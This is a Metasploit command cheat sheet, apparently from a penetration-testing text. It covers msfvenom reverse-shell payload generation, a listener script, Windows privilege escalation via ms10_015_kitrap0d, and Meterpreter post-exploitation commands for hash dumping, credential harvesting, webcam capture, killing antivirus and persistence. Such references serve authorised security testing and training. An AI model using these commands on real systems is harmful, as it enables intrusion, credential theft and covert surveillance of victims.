Metasploit framework
Start a Metasploit with the following script file:
$msfconsole -r test.rc
To run Metasploit, use the following command:
$msfconsole
Using the database
In Kali Linux, you will need to start up the postgresql
server before using the database:
$ systemctl start postgresql
After starting postgresql
, you will need to create and initialize the msf
database with msfdb init
:
$ msfdb init
If you just created a new exploit and want to refresh metasploit db
to start using the newly created exploit, enter the following:
$service postgresql restart && msfdb reinit
Then, type the following command:
$msfconsole -q
The -q
will start msfconsole
in debug mode, so if you made mistakes in your new exploit class, the debugger will then print it to the screen.
More database-related commands
msf > db_status
: This will confirm that Metasploit is successfully connected to the databasemsf > workspace
: This will display the currently selected workspacesmsf > workspace [new workspace]
: This changes the current workspace to the new one selectedmsf > workspace -a [the name of the workspace to add]
: This is the name of the workspace to addmsf > workspace -d [the name of the workspace to delete]
: This is the name of the workspace to deletemsf > db_import [XML folder path]
: This will import a file from an earlier scan, for example,db_import /root/msfu/nmapScan
msf > db_nmap [nmap arguments]
: This will scan using Nmap, for example,db_nmap -A 172.16.194.134
msf > hosts
: This will list the hosts after a scanmsf > services
: This will list the services found after a scanmsf > creds
: This will list any found credentials after a brute-force scanmsf > loot
: This will retrieve hash dumps if you have already compromised a systemmsf > db_export -f [format] [xml file path]
: For example,-
db_export -f xml /root/msfu/Exported.xml
Getting around
msf > search
: This will locate a specific module according to the search criteria that you provide (try to executehelp search
)msf > search [any keyword]
: For example,search apache version 2.3
msf > grep & search
: For example,grep http search apache
- Search keywords:
app
: Modules that are client or server attacksauthor
: Modules written by this authorbid
: Modules with a matching Bugtraq IDcve
: Modules with a matching CVE IDedb
: Modules with a matching Exploit-DB IDname
: Modules with a matching descriptive nameplatform
: Modules affecting this platformref
: Modules with a matchingref
type
: Modules of a specific type (exploit, auxiliary, or post)
- Examples:
msf > search cve:2009 type:exploit app:client
msf > search name:mysql
msf > search platform:windows
msf > search type:auxiliary
- More commands:
msf > help
: List the available commandsmsf > back
: Go back one stepmsf > exit
: Exit msfconsole
Using modules
msf > use [module name]
: Select a module to use it. For example, usedos/windows/smb/ms09_001_write
.msf > show
: This will show info about a specific item in Metasploit.msf > show
: Enteringshow
at themsfconsole
prompt will display every module within Metasploit.msf > show options
: This will show the module options.msf > show auxiliary
: This will display a list of all of the available auxiliary modules within Metasploit.msf > show exploits
: This will get a listing of all exploits contained in the framework.msf > show payloads
: This will display all of the different payloads (either within Metasploit or in the same module).msf > show targets
: This will display which targets are supported within the context of an exploit module.msf > show advanced
: This will show you more advanced options if you wish to further fine-tune an exploit.msf > show encoders
: This will display a list of the encoders that are available within msfconsole.msf > show nops
: This will display the NOP generators that Metasploit has to offer.msf > info [module name]
: This will provide you with detailed information about a module. For example,info exploit/windows/http/apache_chunked
.msf > check
: This will verify whether the target is vulnerable, but you will need to set the options first.msf > set
: Theset
command allows you to configure the framework options and parameters for the current module you are working with. For example,set RHOST 172.16.194.134
.msf > setg
: This will set global variables withinmsfconsole
. For example,setg LHOST 10.0.0.100
.msf > unset
: Theunset
command removes a parameter that has been previously configured withset
. You can remove all assigned variables withunset all
. For example,unset THREADS
.msf > save
: Thesave
command will save your current environment and settings.msf > jobs [option]
: Thejobs
command provides the ability to list and terminate these jobs. Use thejobs -h
command to get the available options. For example,jobs -l
.
Miscellaneous
msf > load [plugin name]
: Theload
command loads a plugin from Metasploit's plugin directory. Arguments are passed askey=val
on the shell. For example,load pcap_log
.msf > unload [plugin name]
: Theunload
command unloads a previously loaded plugin and removes any extended commands. For example,unload pcap_log
.msf > loadpath [module path]
: Theloadpath
command will load a third-party module tree for the path so you can point Metasploit at your 0-day exploits, encoders, payloads, and so on. For example,loadpath exploit/windows/test/test_module
.msf > connect [IP]
: This is similar tonetcat
. It is good for banner grabbing and interacting with the service. For example,connect 192.168.1.10
.
msfvenom
msfvenom
can be used, for example, to generate a reverse TCP Meterpreter payload for Windows OS:
$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 -b "\x00" -f exe -o Meterpreter.exe
- Platforms: The following are the platform values that we can use:
Cisco
or cisco
, OSX
or osx
, Solaris
or solaris
, BSD
or bsd
, OpenBSD
or openbsd
, hardware
, Firefox
or firefox
, BSDi
or bsdi
, NetBSD
or netbsd
, NodeJS
or nodejs
, FreeBSD
or freebsd
, Python
or python
, AIX
or aix
, JavaScript
or javascript
, HPUX
or hpux
, PHP
or php
, Irix
or irix
, Unix
or unix
, Linux
or linux
, Ruby
or ruby
, Java
or java
, Android
or android
, Netware
or netware
, Windows
or windows
, mainframe
, multi
.
- Executable formats: The following are the executable formats that we can use:
asp
, aspx
, aspx-exe
, dll
, elf
, elf-so
, exe
, exe-only
, exe-service
, exe-small
, hta-psh
, loop-vbs
, macho
, msi
, msi-nouac
, osx-app
, psh
, psh-net
, psh-reflection
, psh-cmd
, vba
, vba-exe
, vba-psh
, vbs
, war
.
- Transform formats: The following are the transform formats that we can use:
bash
,c
,csharp
,dw
,dword
,hex
,java
,js_be
,js_le
,num
,perl
,pl
,powershell
,ps1
,py
,python
,raw
,rb
,ruby
,sh
,vbapplication
,vbscript
.
Listener scripting
$ touch script.rc
$ echo use exploit/multi/handler >> script.rc
$ echo set PAYLOAD windows/meterpreter/reverse_tcp >> script.rc
$ echo set LHOST 192.168.0.114 >> script.rc
$ echo set ExitOnSession false >> script.rc
$ echo exploit -j -z >> script.rc
$ msfconsole -r script.rc
Meterpreter
msf > sessions [options or ID]
: Thesessions
command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNCs, and so on (usesessions -h
to get help).meterpreter > background
: This will send the current Meterpreter session to the background and return you to themsf
prompt.meterpreter > getuid
: Displays to the user whether the Meterpreter server is running on the host.meterpreter > sysinfo
: Displays the victim's OS info.meterpreter > cd
: Changes the current directory on the compromised system.meterpreter > ls
: Lists the current directory's contents.meterpreter > pwd
: Prints the current directory on the compromised system.meterpreter > ps
: Displays a list of running processes on the target.meterpreter > run post/windows/manage/migrate
: Migrates to another process on the victim.meterpreter > use priv
: Use this command before executing thegetsystem
command.meterpreter > getsystem
: Use this command to elevate your privileges.
If you get the error priv_elevate_getsystem: Operation failed: Access is denied
, then follow these steps:
meterpreter > background
Option 1:
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > run
Option 2:
msf > use exploit/windows/local/
: List of all Windows exploits.msf > use exploit/windows/local/ms10_015_kitrap0d
: We've chosen one exploit from the list, as follows:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM - Hooray
meterpreter > search
: Provides a way of locating specific files on the target host. For example,search -f passwords*.txt
.meterpreter > cat [file name path]
: Displays the content of a file when it's given as an argument.meterpreter > download [file name path]
: Downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. For example,download C:\\passwords.txt
.meterpreter > upload [local file name] [remote path]
: For example,upload evil_trojan.exe c:\\windows\\system32
.meterpreter > execute [command]
: Runs a command on the target systemmeterpreter > shell
: Executes the shell (Terminal or DOS) on the target system.meterpreter > run post/windows/gather/hashdump
: A post module that will dump the contents of the SAM database.meterpreter >ipconfig
: Displays the network interfaces and addresses on the remote machine.meterpreter > webcam_list
: Displays the currently available webcams on the target host.meterpreter > webcam_snap
: Grabs a picture from a connected webcam on the target system and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example,webcam_snap -i 1 -v false
.meterpreter > python_import [local python file]
: Imports a local Python file and executes it on the victim's machine. For example,meterpreter > python_import -f /root/readAutoLogonREG.py
.meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
meterpreter > run post/windows/gather/checkvm
: Checks to see if the compromised host is a virtual machine.meterpreter > run post/windows/gather/credentials/credential_collector
: Harvests passwords hashes and tokens on the compromised host.meterpreter > run post/windows/gather/dumplinks
: Thedumplinks
module parses the.lnk
files in a user's recent documents, which could be useful for further information gathering.meterpreter > run post/windows/gather/enum_applications
: Enumerates the applications that are installed on the compromised host.meterpreter > run post/windows/gather/enum_logged_on_users
: Returns a list of current and recently logged on users, along with their SIDs.meterpreter > run post/windows/gather/enum_shares
: Returns a list of both configured and recently used shares on the compromised system.meterpreter > run post/windows/gather/enum_snmp
: Enumerates the SNMP service configuration on the target, if present, including the community strings.meterpreter > run post/windows/gather/hashdump
: Dumps the local users' accounts on the compromised host using the registry.meterpreter > run post/windows/gather/usb_history
: Enumerates the USB drive history on the compromised system.meterpreter > run getcountermeasure
: Checks the security configuration on the victims' system and can disable other security measures, such as A/V, the firewall, and much more.meterpreter > run getgui -e
: Enables RDP on a target system if it is disabled.meterpreter > run gettelnet -e
: Enables Telnet on the victim if it is disabled.meterpreter > run killav
: Disables most antivirus programs running as a service on a target.meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100
: Enumerates the system information throughwmic
on the victim. Makes note of where the logs are stored.meterpreter > run scraper
: Grabs the system information, including the entire registrymeterpreter > run winenum
: This makes for a very detailed Windows enumeration tool. It dumps tokens, hashes, and much more.meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5
: Configures our persistent Meterpreter session to wait until a user logs on to the remote system and tries to connect back to our listener every 10 seconds at IP address192.168.1.5
on port443
.